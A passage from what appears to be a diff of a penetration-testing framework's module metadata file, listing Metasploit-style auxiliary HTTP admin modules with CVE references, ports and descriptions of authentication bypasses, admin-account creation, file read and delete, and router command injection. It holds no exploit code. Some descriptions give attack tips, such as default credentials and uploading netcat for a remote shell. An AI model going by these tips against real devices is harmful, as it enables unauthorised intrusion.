is\n possible to bypass authentication.", - "references": [ - "CVE-2010-2731", - "OSVDB-66160", - "MSB-MS10-065", - "URL-https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": 
"/modules/auxiliary/admin/http/iis_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/iis_auth_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/intersil_pass_reset": { - "name": "Intersil (Boa) HTTPd Basic Authentication Password Reset", - "fullname": "auxiliary/admin/http/intersil_pass_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-09-10", - "type": "auxiliary", - "author": [ - "Luca \"ikki\" Carettoni ", - "Claudio \"paper\" Merloni ", - "Max Dietz " - ], - "description": "The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11\n allows basic authentication bypass when the user string is greater\n than 127 bytes long. The long string causes the password to be\n overwritten in memory, which enables the attacker to reset the\n password. In addition, the malicious attempt also may cause a\n denial-of-service condition.\n\n Please note that you must set the request URI to the directory that\n requires basic authentication in order to work properly.", - "references": [ - "CVE-2007-4915", - "BID-25676", - "PACKETSTORM-59347" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/intersil_pass_reset", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/iomega_storcenterpro_sessionid": { - "name": "Iomega StorCenter Pro NAS Web Authentication Bypass", - "fullname": "auxiliary/admin/http/iomega_storcenterpro_sessionid", - "aliases": [], - 
"rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,\n allowing for simple brute force attacks to bypass authentication and gain administrative\n access.", - "references": [ - "OSVDB-55586", - "CVE-2009-2367" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb", - "is_install_path": true, - "ref_name": "admin/http/iomega_storcenterpro_sessionid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/ivanti_vtm_admin": { - "name": "Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)", - "fullname": "auxiliary/admin/http/ivanti_vtm_admin", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-08-05", - "type": "auxiliary", - "author": [ - "Michael Heinzl", - "ohnoisploited", - "mxalias" - ], - "description": "This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new\n administrative user to the web interface of the application.\n\n Affected versions include 22.7R1, 22.6R1, 22.5R1, 22.3R2, 22.3, 22.2.", - "references": [ - "PACKETSTORM-179906", - "CVE-2024-7593", - "URL-https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US" - ], - "platform": "", - "arch": "", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-08-16 15:43:34 
+0000", - "path": "/modules/auxiliary/admin/http/ivanti_vtm_admin.rb", - "is_install_path": true, - "ref_name": "admin/http/ivanti_vtm_admin", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/jboss_bshdeployer": { - "name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment", - "fullname": "auxiliary/admin/http/jboss_bshdeployer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "us3r777 " - ], - "description": "This module can be used to install a WAR file payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:BSHDeployer's createScriptDeployment() method.", - "references": [ - "CVE-2010-0738", - "OSVDB-64171", - "URL-https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb", - "is_install_path": true, - "ref_name": "admin/http/jboss_bshdeployer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Deploy", - "description": "Create and deploy app (WAR) to deliver payload" - }, - { - "name": "Undeploy", - "description": "Remove app (WAR) for cleanup" - } - ] - }, - 
"auxiliary_admin/http/jboss_deploymentfilerepository": { - "name": "JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment", - "fullname": "auxiliary/admin/http/jboss_deploymentfilerepository", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "us3r777 " - ], - "description": "This module uses the DeploymentFileRepository class in the JBoss Application Server\n to deploy a JSP file which then deploys an arbitrary WAR file.", - "references": [ - "CVE-2010-0738", - "OSVDB-64171", - "URL-https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb", - "is_install_path": true, - "ref_name": "admin/http/jboss_deploymentfilerepository", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Deploy", - "description": "Create and deploy app (WAR) to deliver payload" - }, - { - "name": "Undeploy", - "description": "Remove app (WAR) for cleanup" - } - ] - }, - "auxiliary_admin/http/jboss_seam_exec": { - "name": "JBoss Seam 2 Remote Command Execution", - "fullname": "auxiliary/admin/http/jboss_seam_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-19", - "type": "auxiliary", - "author": [ - "guerrino di massa", - "Cristiano Maruti " - ], - "description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n Language (EL) 
expressions, which allows remote attackers to execute arbitrary code\n via a crafted URL. This modules also has been tested successfully against IBM\n WebSphere 6.1 running on iSeries.\n\n NOTE: this is only a vulnerability when the Java Security Manager is not properly\n configured.", - "references": [ - "CVE-2010-1871", - "OSVDB-66881" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/jboss_seam_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/joomla_registration_privesc": { - "name": "Joomla Account Creation and Privilege Escalation", - "fullname": "auxiliary/admin/http/joomla_registration_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-10-25", - "type": "auxiliary", - "author": [ - "Fabio Pires ", - "Filipe Reis ", - "Vitor Oliveira " - ], - "description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. 
If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).", - "references": [ - "CVE-2016-8869", - "CVE-2016-8870", - "URL-https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html", - "URL-https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html", - "URL-https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/joomla_registration_privesc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/kaseya_master_admin": { - "name": "Kaseya VSA Master Administrator Account Creation", - "fullname": "auxiliary/admin/http/kaseya_master_admin", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-09-23", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n Master Administrator account. Normally this page is only accessible via the localhost\n interface, but the application does nothing to prevent this apart from attempting to\n force a redirect. 
This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n v9.0.0.3.", - "references": [ - "CVE-2015-6922", - "ZDI-15-448", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Kaseya/kaseya-vsa-vuln-2.txt", - "URL-https://seclists.org/bugtraq/2015/Sep/132" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb", - "is_install_path": true, - "ref_name": "admin/http/kaseya_master_admin", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/katello_satellite_priv_esc": { - "name": "Katello (Red Hat Satellite) users/update_roles Missing Authorization", - "fullname": "auxiliary/admin/http/katello_satellite_priv_esc", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-24", - "type": "auxiliary", - "author": [ - "Ramon de C Valle " - ], - "description": "This module exploits a missing authorization vulnerability in the\n \"update_roles\" action of \"users\" controller of Katello and Red Hat Satellite\n (Katello 1.5.0-14 and earlier) by changing the specified account to an\n administrator account.", - "references": [ - "CVE-2013-2143", - "CWE-862", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=970849" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb", - "is_install_path": true, - "ref_name": "admin/http/katello_satellite_priv_esc", - "check": false, - 
"post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/limesurvey_file_download": { - "name": "Limesurvey Unauthenticated File Download", - "fullname": "auxiliary/admin/http/limesurvey_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-10-12", - "type": "auxiliary", - "author": [ - "Pichaya Morimoto", - "Christian Mehlmauer " - ], - "description": "This module exploits an unauthenticated file download vulnerability\n in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n as a ZIP and unzipped automatically, thus binary files can be downloaded.", - "references": [ - "URL-https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/", - "URL-https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015", - "URL-https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/limesurvey_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/linksys_e1500_e2500_exec": { - "name": "Linksys E1500/E2500 Remote Command Execution", - "fullname": "auxiliary/admin/http/linksys_e1500_e2500_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-02-05", - "type": "auxiliary", - "author": [ - "Michael Messner " - ], - "description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n 
Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command. A ping command against a controlled system for can be used for\n testing purposes.", - "references": [ - "OSVDB-89912", - "BID-57760", - "EDB-24475", - "URL-http://www.s3cur1ty.de/m1adv2013-004" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/linksys_e1500_e2500_exec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/linksys_tmunblock_admin_reset_bof": { - "name": "Linksys WRT120N tmUnblock Stack Buffer Overflow", - "fullname": "auxiliary/admin/http/linksys_tmunblock_admin_reset_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-19", - "type": "auxiliary", - "author": [ - "Craig Heffner", - "Michael Messner " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n to reset the password of the management interface temporarily to an empty value.\n This module has been tested successfully on a WRT120N device with firmware version\n 1.0.07.", - "references": [ - "EDB-31758", - "OSVDB-103521", - "URL-https://web.archive.org/web/20210424073058/http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 
14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb", - "is_install_path": true, - "ref_name": "admin/http/linksys_tmunblock_admin_reset_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/linksys_wrt54gl_exec": { - "name": "Linksys WRT54GL Remote Command Execution", - "fullname": "auxiliary/admin/http/linksys_wrt54gl_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-18", - "type": "auxiliary", - "author": [ - "Michael Messner " - ], - "description": "Some Linksys Routers are vulnerable to OS Command injection.\n You will need credentials to the web interface to access the vulnerable part\n of the application.\n Default credentials are always a good starting point. admin/admin or admin\n and blank password could be a first try.\n Note: This is a blind OS command injection vulnerability. This means that\n you will not see any output of your command. 
Try a ping command to your\n local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n Hint: To get a remote shell you could upload a netcat binary and exec it.\n WARNING: this module will overwrite network and DHCP configuration.", - "references": [ - "URL-http://www.s3cur1ty.de/m1adv2013-01", - "URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl", - "EDB-24202", - "BID-57459", - "OSVDB-89421" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/linksys_wrt54gl_exec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/manage_engine_dc_create_admin": { - "name": "ManageEngine Desktop Central Administrator Account Creation", - "fullname": "auxiliary/admin/http/manage_engine_dc_create_admin", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-12-31", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. 
It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.", - "references": [ - "CVE-2014-7862", - "OSVDB-116554", - "URL-https://seclists.org/fulldisclosure/2015/Jan/2", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt" - ], - "platform": "", - "arch": "", - "rport": 8020, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-08 10:51:35 +0000", - "path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb", - "is_install_path": true, - "ref_name": "admin/http/manage_engine_dc_create_admin", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/manageengine_dir_listing": { - "name": "ManageEngine Multiple Products Arbitrary Directory Listing", - "fullname": "auxiliary/admin/http/manageengine_dir_listing", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-01-28", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. 
Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.", - "references": [ - "CVE-2014-7863", - "OSVDB-117696", - "URL-https://seclists.org/fulldisclosure/2015/Jan/114", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb", - "is_install_path": true, - "ref_name": "admin/http/manageengine_dir_listing", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/manageengine_file_download": { - "name": "ManageEngine Multiple Products Arbitrary File Download", - "fullname": "auxiliary/admin/http/manageengine_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-01-28", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. 
Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.", - "references": [ - "CVE-2014-7863", - "OSVDB-117695", - "URL-https://seclists.org/fulldisclosure/2015/Jan/114", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/manageengine_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/manageengine_file_download", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/manageengine_pmp_privesc": { - "name": "ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection", - "fullname": "auxiliary/admin/http/manageengine_pmp_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-08", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n privileges and obtain Super Administrator access. A Super Administrator can then\n use his privileges to dump the whole password database in CSV format. PMP can use\n both MySQL and PostgreSQL databases but this module only exploits the latter as\n MySQL does not support stacked queries with Java. 
PostgreSQL is the default database\n in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n so a higher version does not guarantee exploitability. This module has been tested\n on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n v7.1 build 7105 and above.", - "references": [ - "CVE-2014-8499", - "OSVDB-114485", - "URL-https://seclists.org/fulldisclosure/2014/Nov/18", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt" - ], - "platform": "", - "arch": "", - "rport": 7272, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/manageengine_pmp_privesc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/mantisbt_password_reset": { - "name": "MantisBT password reset", - "fullname": "auxiliary/admin/http/mantisbt_password_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-04-16", - "type": "auxiliary", - "author": [ - "John (hyp3rlinx) Page", - "Julien (jvoisin) Voisin" - ], - "description": "MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.", - "references": [ - "CVE-2017-7615", - "EDB-41890", - "URL-https://mantisbt.org/bugs/view.php?id=22690", - "URL-http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt" - ], - "platform": "Linux,Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 
14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/mantisbt_password_reset", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/mutiny_frontend_read_delete": { - "name": "Mutiny 5 Arbitrary File Read and Delete", - "fullname": "auxiliary/admin/http/mutiny_frontend_read_delete", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-15", - "type": "auxiliary", - "author": [ - "juan vazquez " - ], - "description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n appliance. The EditDocument servlet provides file operations, such as copy and\n delete, which are affected by a directory traversal vulnerability. Because of this,\n any authenticated frontend user can read and delete arbitrary files from the system\n with root privileges. In order to exploit the vulnerability a valid user (any role)\n in the web frontend is required. 
The module has been tested successfully on the\n Mutiny 5.0-1.07 appliance.", - "references": [ - "CVE-2013-0136", - "US-CERT-VU-701572", - "URL-http://web.archive.org/web/20250114041839/https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb", - "is_install_path": true, - "ref_name": "admin/http/mutiny_frontend_read_delete", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Delete", - "description": "Delete arbitrary file" - }, - { - "name": "Read", - "description": "Read arbitrary file" - } - ] - }, - "auxiliary_admin/http/netflow_file_download": { - "name": "ManageEngine NetFlow Analyzer Arbitrary File Download", - "fullname": "auxiliary/admin/http/netflow_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-30", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. 
Note that when typing Windows paths, you\n must escape the backslash with a backslash.", - "references": [ - "CVE-2014-5445", - "OSVDB-115340", - "URL-https://seclists.org/fulldisclosure/2014/Dec/9", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/netflow_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/netflow_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_auth_download": { - "name": "NETGEAR ProSafe Network Management System 300 Authenticated File Download", - "fullname": "auxiliary/admin/http/netgear_auth_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-02-04", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file download vulnerability that can be exploited by an\n authenticated remote attacker to download any file in the system.\n This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.", - "references": [ - "CVE-2016-1524", - "US-CERT-VU-777024", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt", - "URL-https://seclists.org/fulldisclosure/2016/Feb/30" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 
+0000", - "path": "/modules/auxiliary/admin/http/netgear_auth_download.rb", - "is_install_path": true, - "ref_name": "admin/http/netgear_auth_download", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/netgear_pnpx_getsharefolderlist_auth_bypass": { - "name": "Netgear PNPX_GetShareFolderList Authentication Bypass", - "fullname": "auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-09-06", - "type": "auxiliary", - "author": [ - "Unknown", - "Grant Willcox" - ], - "description": "This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers\n running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows\n unauthenticated attackers to reveal the password for the admin user that is used to log into the\n router's administrative portal, in plaintext.\n\n Once the password has been been obtained, the exploit enables 